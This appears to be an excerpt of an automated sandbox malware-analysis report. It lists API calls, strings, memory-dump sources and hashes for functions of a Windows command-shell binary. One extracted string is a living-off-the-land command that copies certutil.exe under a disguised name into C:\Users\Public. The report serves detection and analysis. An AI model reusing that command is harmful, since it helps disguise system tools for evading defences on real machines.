                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1732F3
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6EB1732A4), ref: 00007FF6EB173309
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6EB173384
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB1911DF
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                              • String ID:
                                              • API String ID: 611521582-0
                                              • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                              • Instruction ID: f62325fa2ac6e02dbbb0105e46924a4d3f2d07f0cab4601ce4728b0a59277332
                                              • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                              • Instruction Fuzzy Hash: F9A1D223F086129AF7188B61E9443FDA6A1FB4DB6DF444035CD0EC77A4DF3EA4498609
                                              Function 00007FF6EB171560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                              • String ID: \\?\
                                              • API String ID: 628682198-4282027825
                                              • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                              • Instruction ID: 71521873a1399bf23577078317561a2343353631847cb25c65d7bae189f27577
                                              • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                              • Instruction Fuzzy Hash: 83E1AE23A0869286EB609B24D8403F963A1FB4E76DF404135DA0E877E4EF7EE659C345
                                              Function 00007FF6EB19AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                              • String ID:
                                              • API String ID: 16309207-0
                                              • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                              • Instruction ID: c8bc83912626709702a7af16bb5ac7926e80c5c5ee9565d2cb6209236a192cf3
                                              • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                              • Instruction Fuzzy Hash: 1F229D63B04BC286EB659F24D8543FA63A0FB4D7A8F404135DA0E8BBA9DF3DE1458705
                                              Function 00007FF6EB17CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                              • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                              • API String ID: 3863671652-4137775220
                                              • Opcode ID: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
                                              • Instruction ID: 959c0ff4beb26df3bbfb2e9e84290b437982bb6485d834b1e14af4837c58fbd2
                                              • Opcode Fuzzy Hash: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
                                              • Instruction Fuzzy Hash: 41E1B863E0969682FA609B14E4543F926A0BF8E778F544035DA0EC33F4DF7EE845874A
                                              Function 00007FF6EB173410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                              • String ID: $Application$System
                                              • API String ID: 3538039442-1881496484
                                              • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                              • Instruction ID: 9d62d770d2eea2714e850576a39337de919e57c0522b6ad97ae7ba1af9673be4
                                              • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                              • Instruction Fuzzy Hash: A251B233A08B4196E7248B55F4003BABAA1FB8DB68F544134DE4E837A4DF3EE459CB05
                                              Function 00007FF6EB19D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB19048E), ref: 00007FF6EB19DA58
                                              • memset.MSVCRT ref: 00007FF6EB19DAD6
                                              • memset.MSVCRT ref: 00007FF6EB19DAFC
                                              • memset.MSVCRT ref: 00007FF6EB19DB22
                                                • Part of subcall function 00007FF6EB183A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB19EAC5,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB183A56
                                                • Part of subcall function 00007FF6EB175194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF6EB1751C4
                                                • Part of subcall function 00007FF6EB18823C: FindFirstFileExW.KERNELBASE ref: 00007FF6EB188280
                                                • Part of subcall function 00007FF6EB18823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6EB18829D
                                                • Part of subcall function 00007FF6EB1801B8: _get_osfhandle.MSVCRT ref: 00007FF6EB1801C4
                                                • Part of subcall function 00007FF6EB1801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6EB18E904,?,?,?,?,00000000,00007FF6EB183491,?,?,?,00007FF6EB194420), ref: 00007FF6EB1801D6
                                                • Part of subcall function 00007FF6EB174FE8: _get_osfhandle.MSVCRT ref: 00007FF6EB175012
                                                • Part of subcall function 00007FF6EB174FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB175030
                                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB19DDB0
                                                • Part of subcall function 00007FF6EB1759E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB175A2E
                                                • Part of subcall function 00007FF6EB1759E4: _open_osfhandle.MSVCRT ref: 00007FF6EB175A4F
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB19DDEB
                                              • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB19DDFA
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB19E204
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB19E223
                                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6EB19E242
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                              • String ID: %9d$%s$~
                                              • API String ID: 3651208239-912394897
                                              • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                              • Instruction ID: 7387756f9749e30bb22a2a297b5c660688b4af3fa275143ddb420b4fad3b7b39
                                              • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                              • Instruction Fuzzy Hash: 7E429133A0C6C286EB659F20E8503F973A1FB49768F504036E64DC7AA9DF3EE5458706
                                              Function 00007FF6EB17372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                              • String ID: COPYCMD$\
                                              • API String ID: 3989487059-1802776761
                                              • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                              • Instruction ID: 2c759cebcb78f87ce1c482d8f7df556f69f9e91633648c6b657cad4145feb2e8
                                              • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                              • Instruction Fuzzy Hash: 6AF1C127A0879691EA149B15E5403FA63A0FF4EBACF148135CA4E877F4EE7EE0958305
                                              Function 00007FF6EB183140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Time$File$System$FormatInfoLocalLocale
                                              • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                              • API String ID: 55602301-2548490036
                                              • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                              • Instruction ID: 913dbcb920f0d323e525d5dd264ee51bf6565db9a98198c8be1aff23f1f2fcdc
                                              • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                              • Instruction Fuzzy Hash: 40A16E33A1C64296EB108B10F4403FAB7A5FB89768F504135EA4E87AB4EF3DE545C74A
                                              Function 00007FF6EB1A1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                              • String ID:
                                              • API String ID: 3935429995-0
                                              • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                              • Instruction ID: 485958f5b9998107d57d67017590050f1746bda67dbcd81ef944284f721f32c3
                                              • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                              • Instruction Fuzzy Hash: 8061D327A1875282E7108F61A4047B9BBA4FF8EF68F059534DE4E837A0DF3DE4058B05
                                              Function 00007FF6EB1735B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                              • Instruction ID: 70fb226508a1d4369a148f05884a330b52c0c9265a2e3f566713337454736706
                                              • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                              • Instruction Fuzzy Hash: 3F91C233A0869296EB248F24D9103F976A0FB4EB6CF004135DA4E877E4EF3EE595C605
                                              Function 00007FF6EB17B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandlememset$wcschr
                                              • String ID: DPATH
                                              • API String ID: 3260997497-2010427443
                                              • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction ID: 94c8c32f737233536db5eeb305ed038b14589eea5bb99206ab3239eba5ff7847
                                              • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction Fuzzy Hash: 8ED1AC23A0865282EA219B25D4503FE62A1FF4DBACF044235DA1D877F4DF3EE845874A
                                              Function 00007FF6EB187FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                              • String ID: @P
                                              • API String ID: 1801357106-3670739982
                                              • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                              • Instruction ID: 956fdc941fbe15a62fee658de14eec34ef515b113a844ff841e6c7c70808801d
                                              • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                              • Instruction Fuzzy Hash: 22414C33B04A82DEE7108F60E4443ED6BA0FB8D76CF845235DA0D82AA8DF79D508C749
                                              Function 00007FF6EB172220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$BufferConsoleInfoScreen
                                              • String ID:
                                              • API String ID: 1034426908-0
                                              • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                              • Instruction ID: 64c584ff1cb67dcb6368377cfc94af661b4be8500914a87ecdf7e7cf6f39f556
                                              • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                              • Instruction Fuzzy Hash: 58F1C033A087D28AEB24CB21D8403E967A0FF4A76CF404134DA4E876A5DF7DE645C746
                                              Function 00007FF6EB19AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseValue$CreateDeleteOpen
                                              • String ID: %s=%s$\Shell\Open\Command
                                              • API String ID: 4081037667-3301834661
                                              • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction ID: b9794d8e301b8b657e17d8edcfd6b70009e6934b85876d0897bf7795bc02ab57
                                              • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction Fuzzy Hash: E771D623B19B8282EB508B55E0503F9A2A1FF8DBA8F444131DE4E877E4DF3EE5498745
                                              Function 00007FF6EB19AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19AA85
                                              • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19AACF
                                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6EB19AAEC
                                              • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19AB39
                                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6EB1998C0), ref: 00007FF6EB19AB6F
